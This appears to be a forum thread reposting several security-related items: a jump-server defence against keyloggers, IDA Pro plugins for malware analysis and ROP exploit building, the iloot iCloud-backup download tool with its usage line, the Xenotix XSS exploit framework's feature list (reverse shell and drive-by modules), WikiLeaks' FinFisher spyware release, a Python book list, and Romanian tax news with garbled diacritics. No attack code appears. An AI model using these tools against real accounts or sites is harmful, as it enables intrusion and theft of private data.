Nytro

[h=3]Defence - Beating Keyloggers to protect Domain Admin Creds - Windows[/h] Hi All, This post is a little different to what I normally do and I think it is a long time coming in general. Nowadays the bloggers in the IT Security community are all focusing on the hacks, exploits and ways to break in. I thought I would show you a way to improve the overall security of your network. This can be implemented quite easily and is a control mandated in the Internet Security Manual. For anyone not in Australia or not aware of the ISM here is the blurb from ASD. “The Australian Signals Directorate (ASD) produces the Australian Government Information Security Manual (ISM). The manual is the standard which governs the security of government ICT systems” Link: http://www.asd.gov.au/publications/Information_Security_Manual_2014_Controls.pdf I want to state that this is not the only way to design your network and this example is specifically for handling keylogging to protect your domain admin accounts. From what I am seeing there are two types of networks around these days. Flat Networks: Hosts, Admin hosts and Servers in same Subnet Layered networks: Hosts one subnet, admin another subnet and servers in another subnet In a flat network any normal host / admin host can RDP into any server. In a layered network normal hosts cannot RDP into the server subnet but admin hosts can. What does this mean for keyloggers? Flat Network In a flat network your domain admins / server admins are able to logon to any server they want with their admin credentials. If this is the same as there workstation credentials, email associated, this is a bad thing in general. For this example we will assume the following: The workstation credentials are different to the admin credentials. The workstation credential will be named BobSmith The admin credentials will be named BobAdmin. Layered Network Now expand on this, Bob is in a separate subnet to the rest of the environment and he can RDP to any server he chooses to. Bob has a keylogger that he doesn’t know about. When bob decides to logon to Server A he uses his BobAdmin account. Here is what it looks like. Attack #1 Bob logs in to RDP server. Meterpreter dumps out the password that is typed and Admin credentials are presented. Dammit! Isn’t defense in layers supposed to be better? Well yes. So you are now asking how do you protect the domain admin credentials? Easy… Setup a management server. Here is a picture of how it works. I dummied up some IP ranges to give you an example. Management Server: You can handle this one of two ways. Bob Smith needs a separate account that is allowed to RDP onto the management server but has no admin privileges on the management server. For example an account named bobRDP. bobRDP can only RDP to the management server and nowhere else. Bob Smith uses ‘BobSmith’ to RDP to the server and again has no admin privileges on the management server. Option 1 allows a little more separation of accounts and adds an administrative burden. Option 2 is a quick fix. It is important that BobSmith is only allowed to logon to the management server and nowhere else. Essentially the admin subnet is only allowed TCP 3389 / RDP to the management server NOWHERE ELSE! No other ports. For this example I am using option 2 because I’m lazy and it allows me to bang out this post quickly. Attack # 2 Permissions on Jump Server for bobsmith Pre meterpreter dump on Bobs workstation. Nothing showed. Bob RDPs to the management server Runs mstsc and RDPs to domain controller server. Open Command Prompt on Jump Server Open Command prompt on Nested RDP - Domain controller Dump of meterpreter keylogger after As you can see there is no remnants of bobAdmins password or him typing in the management server. Keylogging problem solved! Now people may look at this post and find so many ways around this design with other attack vectors. But, this post was specifically for one issue and that is to beatMy keyloggers nothing else. Hopefully this post has been helpful to you. Posted by Mickey Perre at 20:07 Sursa: Mickeys Security Blogspot: Defence - Beating Keyloggers to protect Domain Admin Creds - Windows

FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis September 11, 2014 | By Moritz Raabe | The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts at the following location: https://github.com/fireeye/flare-ida. We hope you find all these scripts as useful as we do. Motivation During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it. Introduction The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files. Features Table 1 shows what benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments get pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would be required to research the respective argument, import the corresponding standard enumeration into IDA and then manually rename each value. The right side of Table 1 shows the result of executing our plug-in showing the support it offers to an analyst. The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly. Table 1: Automatic labelling of standard symbolic constants In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over dwShareMode, the automatically renamed constant displays descriptive information. Functions Arguments Constants Figure 1: Hovering function names, arguments and constants displays the respective descriptions How it works Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong. The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files. For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup. Figure 2: Annotated import table Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary. Figure 3: The additional segment added to the IDA database The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment. Figure 4: Names and comments inserted for argument descriptions To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA. Figure 5: Descriptions added to the constant enumeration members Preparing the MSDN database file The plug-in’s graphical interface requires you to have the QT framework and Python scripting installed. This is included with the IDA Pro 6.6 release. You can also set it up for IDA 6.5 as described here (Precompiled PySide binaries for IDA Pro | Hex Blog). As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file. It can be cloned from the git repository at https://github.com/fireeye/flare-ida together with the annotation plug-in. You can take the following steps to setup the database file. You only have to do this once. Download and install an offline version of the MSDN documentationYou can download the Microsoft Windows SDK MSDN documentation. The standalone installer can be downloaded from Download Microsoft Windows SDK for Windows 7 and .NET Framework 3.5 SP1 (ISO) from Official Microsoft Download Center. Although it is not the newest SDK version, it includes all the needed information and data extraction is straight-forward.As shown in Figure 6, you can select to only install the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033. Figure 6: Installing a local copy of the MSDN documentation Extract the files with an archive manager like 7-zip to a directory of your choice. Download and extract tilib.exe from Hex-Ray’s download page at https://www.hex-rays.com/products/ida/support/download.shtml To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is running correctly. Run MSDN_crawler/msdn_crawler.py <path to extracted MSDN documentation> <path to tilib.exe> <path to til files> With these prerequisites fulfilled, you can run the MSDN_crawler.py script, located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution the final XML database file should be located in the MSDN_data directory. You can now run our plug-in to annotate your disassembly in IDA. Running the MSDN annotations plug-in In IDA, use File – Script file… (ALT + F7) to open the script named annotate_IDB_MSDN.py. This will display the dialog box shown in Figure 7 that allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions, arguments and rename constants. If you change the settings and execute the plug-in by clicking OK, your settings get stored in a configuration file in the plug-in’s directory. This allows you to quickly run the plug-in on other samples using your preferred settings. If you do not choose to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over the element. Figure 7: The plug-in’s configuration window showing the default settings When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8. Figure 8: The plug-in’s preview of function annotations with repeatable comments Similar Tools and Known Limitations Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer which greatly supported our development. Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms. Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element. For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1. [TABLE=width: 100%] [TR] [TD] <?xml version=”1.0? encoding=”ISO-8859-1??> <msdn> <functions> <function> <name>CreateFileA</name> <arguments> <argument> <name>dwDesiredAccess</name> <constants enums=”MACRO_GENERIC”> <constant> <name>GENERIC_ALL</name> <value>0×10000000</value> <description>All possible access rights</description> </constant> <constant> <name>GENERIC_EXECUTE</name> <value>0×20000000</value> <description>Execute access</description> </constant> <constant> <name>GENERIC_WRITE</name> <value>0×40000000</value> <description>Write access</description> </constant> <constant> <name>GENERIC_READ</name> <value>0×80000000</value> <description>Read access</description> </constant> </constants> </argument> </arguments> </function> </functions> </msdn> [/TD] [/TR] [/TABLE] Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function Conclusion In this post, we showed how you can generate a MSDN database file used by our plug-in to automatically annotate information about functions, arguments and constants into IDA Pro’s disassembly. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process! Stay tuned for the FLARE Team’s next post where we will release solutions for the FLARE On Challenge (www.flare-on.com). Sursa: FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis | FireEye Blog

Using this CLI tool you can download backups of devices assigned to your AppleID. Based on iphone-dataprotection script, so copyrights belong to respective owners. Offset operations added and other minor bugs fixed. This tool is for educational purposes only. Before you start, make sure it's not illegal in your country. Follow us on twitter @hackappcom and facebook Hackapp blog Mobile Applications Scanner hackapp.com [h=1]Example[/h] python iloot.py <appleID> <password> Sursa: https://github.com/hackappcom/iloot

Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be. See What's new! Feature Additions Intelli Fuzzer Context Based Fuzzer Blind Fuzzer HTA Network Configuration HTA Drive-By HTA Drive-By Reverse Shell JSFuck 6 Char Encoder jjencode Encoder aaencode Encoder IP to Location IP to GeoLocation IP Hinting Download Spoofer HTML5 Geolocation API Reverse TCP Shell Addon (Linux) OAuth 1.0a Request Scanner 4800+ Payloads SSL Error Fixed Download OWASP Xenotix XSS Exploit Framework or https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Regards, Ajin | @ajinabraham Sursa: WebApp Sec: OWASP Xenotix XSS Exploit Framework v6 Released

[h=1]IDA Sploiter[/h] [TABLE] [TR] [TH]Download[/TH] [TD] idasploiter-1.0.zip [/TD] [/TR] [TR] [TH]Size[/TH] [TD] 25.4 KB [/TD] [/TR] [TR] [TH]Date[/TH] [TD]September 14th, 2014[/TD] [/TR] [TR] [TH]Version[/TH] [TD]1.0[/TD] [/TR] [/TABLE] IDA Sploiter is a plugin for Hex-Ray's IDA Pro disassembler designed to enhance IDA's capabilities as an exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others. The motivation for the development of IDA Sploiter was to make IDA Pro a comfortable, powerful and integrated environment for vulnerability research and exploit development. The plugin is designed to make many repetitive and time consuming tasks as effortless and natural as possible, so you can concentrate on other more challenging aspects of exploit development. To make the work with the plugin convenient, IDA Sploiter closely integrates with the IDA UI and exposes its functionality and various configurations through various views and forms. The plugin's logic uses IDA's powerful disassembly engine and various debugger plugins. As a result, IDA Sploiter can take advantage of many of IDA's unique features (e.g. building ROP chains remotely on a lab machine while effortlessly switching between debugger plugins). In the user guide below, you will find a comprehensive discussion of various plugin features and their sample use. Most of the sections are independent of each other, so you are welcome to jump ahead or read through the entire guide. Feel free to contact me if you have any questions, feature requests, bugs or just to say hello Table of Contents Installation Compatibility User guide Modules Filtering Modules Searching module selection [*]ROP gadgets Searching ROP gadgets Viewing ROP gadgets Syntactic and semantic gadget filters ROP chain builder Stack Pivoting Exporting [*]Writable function pointers Searching writable function pointers Viewing writable function pointers Pointer offsets Setting breakpoints Exporting [*]Memory patterns Creating a pattern Detecting a pattern [*]Comparing file to memory [*]Special Note [*]References Sursa: ida sploiter | projects | sprawl

[h=2]Text Processing in Python[/h] [h=3]David Mertz[/h] Intermediate This is an example-driven, hands on tutorial that carefully teaches programmers how to accomplish numerous text processing tasks using Python. [h=2]Probabilistic Programming and Bayesian Methods for Hackers: Using Python and PyMC[/h] [h=3]Cam Davidson-Pilon and community[/h] Intermediate aka 'Bayesian Methods for Hackers': An introduction to Bayesian methods + probabilistic programming in data analysis with a computation/understanding-first, mathematics-second point of view. All in pure Python [h=2]Explore Flask[/h] [h=3]Robert Picard.[/h] Intermediate This book is a collection of the best practices for using Flask. There are a lot of pieces to the average Flask application. [h=2]Building skills in Python[/h] [h=3]Steven F. Lot [/h] Beginner This 450+ page book has 42 chapters that will help you build Python programming skills through a series of exercises. This book includes six projects from straight-forward to sophisticated that will help solidify your Python skills. [h=2]web2py Complete Manual[/h] [h=3]Massimo Di Pierro[/h] Intermediate As you will learn in the following pages, web2py tries to lower the barrier of entry to web development by focusing on three main goals: ease of use, rapid development and security [h=2]Learning Python, 4th Edition[/h] [h=3]Mark Lutz[/h] Beginner It's an easy-to-follow self-paced tutorial, based on author and Python expert Mark Lutz's popular training course. [h=2]The Hitchhiker’s Guide to Python![/h] [h=3]Kenneth Reitz[/h] Beginner This opinionated guide exists to provide both novice and expert Python developers a best-practice handbook to the installation, configuration, and usage of Python on a daily basis. [h=2]Biopython[/h] [h=3]Various authors[/h] Intermediate This is a tutorial and cookbook for Biopython (Biopython is a set of freely available toos for biological computations. [h=2]Invent Your Own Computer Games with Python[/h] [h=3]Al Sweigart[/h] Intermediate Small and nice python game examples [h=2]Python Practice Book[/h] [h=3]Anand Chitipothu.[/h] Beginner This book is prepared from the training notes of Anand Chitipothu. Anand conducts Python trainings classes on a semi-regular basis in Bangalore, India. [h=2]Building skills in OOP[/h] [h=3]Steven F. Lot [/h] Intermediate How do you move from OO programming to OO design? This 301-page book has 49 chapters that will help you build OO design skills through the creation of a moderately complex family of application programs. [h=2]Python Cookbook, Third Edition[/h] [h=3]Various authors[/h] Intermediate This book is aimed at more experienced Python programmers who are looking to deepen their understanding of the language and modern programming idioms. [h=2]How to Tango with Django[/h] [h=3]Leif Azzopardi[/h] Beginner A beginner's guide to web development with Django 1.5.4. This book has been designed to get you going fast and to learn by example. You'll learn the key aspects of the Python Django Framework by developing an application called Rango. [h=2]Think Python[/h] [h=3]Allen B. Downey[/h] Beginner A very exhaustive book covering most of the language features, from datatypes to OOP and debugging. [h=2]Kivy programming Guide[/h] [h=3]Kivy[/h] Intermediate Discover Kivy the multitouch Python framework for desktop and mobile, and learn how to create a simple game. [h=2]Python para Desenvolvedores (2nd Edition)[/h] [h=3]Luiz Eduardo Borges[/h] Intermediate [PORTUGUESE] Este livro aborda assuntos que incluem: criação de interfaces com usuário, computação gráfica, aplicações para internet, sistemas distribuídos, entre outros. [h=2]Django Tutorial[/h] [h=3]Community[/h] Intermediate With this hands-on tutorial, discover Django the popular high-level Python Web framework that encourages rapid development and clean, pragmatic design. [h=2]Python Scientific lecture notes[/h] [h=3]by the community[/h] Intermediate Teaching material on the scientific Python ecosystem, a quick introduction to central tools and techniques. The different chapters each correspond to a 1 to 2 hours course with increasing level of expertise, from beginner to expert. [h=2]Programmez avec Python 2[/h] [h=3]Gérard Swinnen[/h] Beginner [FRENCH] Apprenez à programmer avec Python 2. Découvrez la programmation et le language Python grâce à cet ouvrage de référence. [h=2]Making games with Python and Pygame[/h] [h=3]Al Sweigart[/h] Intermediate Making Games with Python & Pygame” covers the Pygame library with the source code for 11 games. [h=2]Pyramid for Humans[/h] [h=3]Community[/h] Intermediate With this tutorial, discover Pyramid a Python web application development framework. Its primary goal is to make it easier for a Python developer to create web applications. [h=2]Problem Solving with Algorithms and Data Structures Using Python[/h] [h=3]B. Miller & D. Ranum[/h] Intermediate This book is a CS2 data structures textbook, with a review of Python concepts in chapter 1 [h=2]Flask microframework[/h] [h=3]Armin Ronacher[/h] Intermediate Learn the Flask web microframework by example. Flask aims to keep the core simple but extensible and gives you freedom to choose the libraries of your choice. [h=2]Learn Python The Hard Way[/h] [h=3]Zed A. Shaw[/h] Beginner Have you always wanted to learn how to code but never thought you could? Do you want to challenge your brain in a new way? [h=2]Python for you and me[/h] [h=3]Kushal Das[/h] Beginner A book for the total new comers into Python world. Was started as book for students before they read Python tutorial. [h=2]Programmez avec Python 3[/h] [h=3]Gérard Swinnen[/h] Beginner [FRENCH] Apprenez à programmer avec Python 3. Mise à jour du précédent ouvrage avec les spécificité de Python 3. [h=2]How to Think Like a Computer Scientist: Second Interactive Edition[/h] [h=3]B. Miller & D. Ranum[/h] Beginner This interactive book teaches you Python the interactive way, right in the browser. [h=2]Dive into Python (2004)[/h] [h=3]Mark Pilgrim[/h] Intermediate Dive Into Python is a free Python book (from 2004) for experienced programmers. It covers many basics of the language [h=2]Hacking Secret Ciphers with Python[/h] [h=3]Al Sweigart[/h] Beginner The book teaches complete beginners how to program in the Python programming language. The reader not only learns about several classical ciphers, but also how to write programs that encrypt and hack these ciphers. [h=2]Test-Driven Development with Python[/h] [h=3]Harry Percival[/h] Intermediate This book uses a concrete example—the development of a website, from scratch—to teach the TDD metholology, and how it applies to web programming, from the basics of database integration and javascript, going via browser-automation tools like Selenium, to advanced (and trendy) topics like NoSQL, websockets and Async programming. [h=2]Dive into Python 3[/h] [h=3]Mark Pilgrim[/h] Intermediate Dive Into Python 3 covers what's new in Python 3 and how its differs from Python 2. [h=2]High Performance Python tutorial[/h] [h=3]Ian Ozsvald[/h] Advanced In this 55 pages tutorial, Ian Ozsvald shows you a number of techniques to get a 10-500 performance increase in your Python apps, from profiling, to PyPy, numPy, Multiprocessing... [h=2]Python course[/h] [h=3]Patrick Fuchs / Pierre Poulain,[/h] Beginner [FRENCH] Beginner and progressive course about Python theory and concepts [h=2]Modeling Creativity[/h] [h=3]Tom De Smedt[/h] Intermediate Case studies in Python - using the libraries nodebox and pattern the author creates wonderful fractals and infographics; python code snippets included [h=2]A byte of Python[/h] [h=3]Swaroop C H[/h] Beginner This book aims to help you learn the wonderful Python language and show how to get things done quickly and painlessly - in effect 'The Perfect Anti-venom to your programming problems'. [h=2]Python 101 - Introduction to Python[/h] [h=3]Dave Kuhlman[/h] Beginner This document is a syllabus for a first course in Python programming. This course contains an introduction to the Python language, instruction in the important and commonly used features of the language, and practical excercises in the use of those features. [h=2]A bit of Python & other things.[/h] [h=3]Jesse Noller[/h] Beginner A usefull page with good links to read about Python [h=2]Snake Wrangling for Kids[/h] [h=3]Jason R. Briggs[/h] Beginner [DOWNLOAD REQUIRED] For children 8 years and older, who would like to learn computer programming. It covers the very basics of programming, and uses the Python programming language to teach the concepts. [h=2]Data Structures and Algorithms with Object-Oriented Design Patterns in Python[/h] [h=3]Bruno R. Preiss[/h] Intermediate This book is about the fundamentals of data structures and algorithms. It uses object oriented design patterns and teaches topics like stacks, queues, lists, hashing and graphs. There are also versions for other programming languages. [h=2]The Standard Python Library[/h] [h=3]Fredrik Lundh[/h] Intermediate This book provides a brief description of each module of the +200 Python standard library and usage examples [h=2]Python 3x Programming (sample)[/h] [h=3]Jody S. Ginther[/h] Beginner (4 free chapters) Python 3x Programming, Made Fun and Easier by Jody S. Ginther is for the beginning programmer who wants to learn visually and have some fun while learning programming. The full course will take the beginner from ground zero to making their own arcade style game complete with; music, sound, graphics, and how to make a distribution package to share it with your friends in 21 lessons. [h=2]Porting to Python 3: An in-depth guide[/h] [h=3]Lennart Regebro[/h] Intermediate This book guides you through the process of porting your Python 2 code to Python 3, from choosing a porting strategy to solving your distribution issues. Using plenty of code examples is takes you cross the hurdles and shows you the new Python features. [h=2]Programming Computer Vision with Python[/h] [h=3]Jan Erik Solem[/h] Advanced [PDF DRAFT] This book gives an entry point to hands-on computer vision (images, videos...) with enough understanding of the underlying theory and algorithms. [h=2]Think Complexity[/h] [h=3]Allen B. Downey[/h] Advanced This book is about complexity science, data structures and algorithms, intermediate programming in Python, and the philosophy of science. [h=2]Natural Language Processing with Python[/h] [h=3]S. Bird, E. Klein & E. Loper[/h] Advanced Practical introduction to programming for language processing, written by the creators of NLTK. [h=2]Think Stats[/h] [h=3]Allen B. Downey[/h] Advanced Think Stats is an introduction to Probability and Statistics for Python programmers. [h=2]Getting Started with Django[/h] [h=3]Kenneth Love[/h] Beginner Getting Started with Django (or GSWD) is a series of video-based lessons meant to take you from novice to competent [1], or maybe even beyond. [h=2]Building skills in Programming[/h] [h=3]Steven F. Lot [/h] Beginner How do you learn to program? Through a series of simple exercises that teach programming fundamentals with an easy-to-use, easy-to-learn programming language. [h=2]An introduction to Python[/h] [h=3]John C. Lusth[/h] Beginner A complete scholar overview of all Python 3 functionnalities from the Alabama University. [h=2]Python Module of the week[/h] [h=3]Doug Hellman[/h] Intermediate The Python Module of the Week series, or PyMOTW, is a tour of the Python standard library through short and concrete examples. It covers more than 50 modules. [h=2]Djen of Django[/h] [h=3]Agiliq[/h] Intermediate Djen of Django is a book consisting of a series of small Django projects based on small real-world examples. For instance, building a Pastebin, a Blog or a Project Management Application. Djen of Django focuses on teaching the reader Django best practices through the use of real-world examples. [h=2]Python Course[/h] [h=3]Google[/h] Beginner This is a free class for people with a little bit of programming experience who want to learn Python. [h=2]A Programmer's Guide to Data Mining[/h] [h=3]Ron Zacharski[/h] Intermediate A guide to practical data mining, collective intelligence, and building recommendation systems. [h=2]Python in Hydrology[/h] [h=3]Sat Kumar Tomer[/h] Beginner Python in Hydrology is written for learning Python using its applications in hydrology. The book covers the basic applications of hydrology, and also the advanced topic like use of copula. [h=2]Non-Programmer's Tutorial for Python 3[/h] [h=3]Josh Cogliati/Wikibooks/Others[/h] Beginner The Non-Programmers' Tutorial For Python 3 is a tutorial designed to be an introduction to the Python programming language. This guide is for someone with no programming experience. [h=2]Python para todos[/h] [h=3]Raúl González Duque[/h] Beginner [sPANISH] Libro sobre programación en Python a modo de tutorial, adecuado para todos los niveles de aprendizaje, desde novatos hasta expertos que quieren conocer más sobre Python. Sursa: PythonBooks - Learn Python the easy way !

SpyFiles 4 Release Documents Customers Database Today, 15 September 2014, WikiLeaks releases previously unseen copies of weaponised German surveillance malware used by intelligence agencies around the world to spy on journalists, political dissidents and others. FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices. FinFisher first came to public attention in December 2011 when WikiLeaks published documents detailing their products and business in the first SpyFiles release. Since the first SpyFiles release, researchers published reports that identified the presence of FinFisher products in countries aroud the world and documented its use against journalists, activists and political dissidents. Julian Assange, WikiLeaks Editor in Chief said: "FinFisher continues to operate brazenly from Germany selling weaponised surveillance malware to some of the most abusive regimes in the world. The Merkel government pretends to be concerned about privacy, but its actions speak otherwise. Why does the Merkel government continue to protect FinFisher? This full data release will help the technical community build tools to protect people from FinFisher including by tracking down its command and control centers." FinFisher Relay and FinSpy Proxy are the components of the FinFisher suite responsible for collecting the data acquired from the infected victims and delivering it to their controllers. It is commonly deployed by FinFisher's customers in strategic points around the world to route the collected data through an anonymizing chain, in order to disguise the identity of its operators and the real location of the final storage, which is instead operated by the FinSpy Master. [TABLE=class: table table-bordered] [TR] [TH]File Name[/TH] [TH]Product Name[/TH] [TH]MD5[/TH] [TH]File Size[/TH] [/TR] [TR] [TD]ffrelay-debian-4.30.ggi.zip[/TD] [TD]FinFisher Relay v4.30[/TD] [TD]180caf23dd71383921e368128fb6db52[/TD] [TD]224K[/TD] [/TR] [TR] [TD]finspy_proxy.zip[/TD] [TD]FinSpy Proxy v2.10[/TD] [TD]3dfdac1304eeaaaff57cc11317768511[/TD] [TD]320K[/TD] [/TR] [TR] [TD]finspy_master.zip[/TD] [TD]FinSpy Master v2.10[/TD] [TD]03d93c49a536d149206f5524d87fa319[/TD] [TD]2.5M[/TD] [/TR] [/TABLE] WikiLeaks is also publishing previously unreleased copies of the FinFisher FinSpy PC spyware for Windows. This software is designed to be covertly installed on a Windows computer and silently intercept files and communications, such as Skype calls, emails, video and audio through the webcam and microphone (you can find more details on FinSpy in the first SpyFiles release). In order to prevent any accidental execution and infection, the following files have been renamed and compressed in password protected archives (the password is "infected"). They are weaponised malware, so handle carefully. [TABLE=class: table table-bordered] [TR] [TH]File Name[/TH] [TH]Product Name[/TH] [TH]MD5[/TH] [TH]File Size[/TH] [/TR] [TR] [TD]finfisher.1.zip[/TD] [TD]FinSpy PC[/TD] [TD]2d5c810035dc0f83036fb12e8775817a[/TD] [TD]736K[/TD] [/TR] [TR] [TD]finfisher.2.zip[/TD] [TD]FinSpy PC[/TD] [TD]434b83eba7619cb706492ff019ade0d5[/TD] [TD]576K[/TD] [/TR] [/TABLE] In order to challenge the secrecy and the lack of accountability of the surveillance industry, analyzing the internals of this software could allow security and privacy researchers to develop new fingerprints and detection techniques, identify more countries currently using the FinFisher spyware and uncover human rights abuses. In addition, in this fourth iteration of the SpyFiles collection, WikiLeaks publishes the newly indexed material the same as the recent FinFisher breach (for which you can find the torrent file here), including new brochures and a database of the customer support website, that provide updated details on their productline and a unique insight into the company's customer-base. In order to make the data more easily accessible and consumable, all the new brochures, videos and manuals are now available organized under the related FinFisher product name. The database is represented in full, from which WikiLeaks compiled a list of customers, their eventual attribution, all the associated support tickets and acquired licenses, along with the estimated costs calculated from FinFisher's price list. WikiLeaks conservatively estimates FinFisher's revenue from these sales to amount to around €50,000,000. Within the full list of customers, it's worth noticing that among the largest is Mongolia, which has been recently selected as new Chair of the Freedom Online Coalition. Together with the previous releases, the SpyFiles collection represents a unique and central resource where to find extensive and exclusive documentation about the global surveillance industry, also indexed and searchable through the =9&sort=0"]WikiLeaks Search. Sursa: https://wikileaks.org/spyfiles4/index.html

ANAF a lansat platforma online prin care persoanele pot afla date despre situa?ia lor fiscal?. Cum func?ioneaz? "Spa?iul virtual privat" ANAF a lansat luni platforma online pe site-ul propriu prin care persoanele fizice pot solicita, în urma înregistr?rii ?i autentific?rii cu username ?i parol?, informa?ii precum situa?ia obliga?iilor de plat?, nivelul CAS declarat de angajator ?i decizia de impunere, r?spunsul venind tot electronic. Platforma, denumit? "Spa?iul virtual privat", este dedicat? deocamdat? persoanelor fizice, în cadrul unui proiect pilot pentru Bucure?ti ?i Ilfov, iar datele pot fi consultate 24 din 24 de ore. "În 2015 inten?ion?m s? extindem proiectul în toat? ?ara, iar dup? ce-l extindem se vor ad?uga în Spa?iul virtual privat ?i alte informa?ii, precum decizii de impunere pentru pl??i anticipate ?i pentru alte accesorii, soma?ii ?i titluri executorii. De asemenea, tot în 2015 vrem s? extindem programul ?i c?tre persoanele juridice, care se vor putea loga cu username ?i parol?", a declarat luni, ministrul Finan?elor Publice, Maria Ioana Petrescu, la lansarea platformei, la care a participat ?i premierul Victor Ponta. Ea a ar?tat c?, în prezent, firmele î?i pot verifica situa?ia fiscal? doar dac? de?in un certificat digital de semn?tur?, care se ob?ine contra cost. Bugetul pentru acest program pilot a fost zero, potrivit ministrului, la care a lucrat o echip? mixt? a ANAF ?i MFP, îns? pentru extinderea la nivel na?ional este nevoie de o infrastructur? de servere. "Suntem în discu?ie cu Banca Mondial? pentru ca serverele pe care trebuie s? le trimit? pentru modernizarea ANAF s? vin? în timp util pentru acest program", a precizat Petrescu. Persoanele fizice pot efectua solicit?rile online, dup? ce s-au autentificat în sistem, iar r?spunsurile sunt primite tot în cadrul aplica?iei, într-o sec?iune de mesaje, cu documentele cerute ata?ate. Obliga?iile de plat? trimise de ANAF sunt valabile pentru ultima zi a lunii anterioare interog?rii, iar deciziile de impunere se pot primi dac? sunt emise dup? data punerii în func?iune a sistemului. Pentru angaja?ii care au venituri doar din contracte individuale de munc? nu se emit decizii de impunere, astfel c? pentru înregistrarea în spa?iul virtual identificarea lor trebuie f?cut? direct la ghi?eul ANAF. Totodat?, ANAF va pune la dispozi?ia contribuabilului serviciul "Buletinul informativ fiscal", inclusiv în perioada de aplicare a proiectului pilot, care va include informa?ii publice cu caracter fiscal, precum calendarul obliga?iilor fiscale, nout??i legislative, ghiduri fiscale, campanii derulate ?i comunicate de pres?. Sursa: ANAF a lansat platforma online prin care persoanele pot afla date despre situa?ia lor fiscal?. Cum func?ioneaz? "Spa?iul virtual privat" - Mediafax

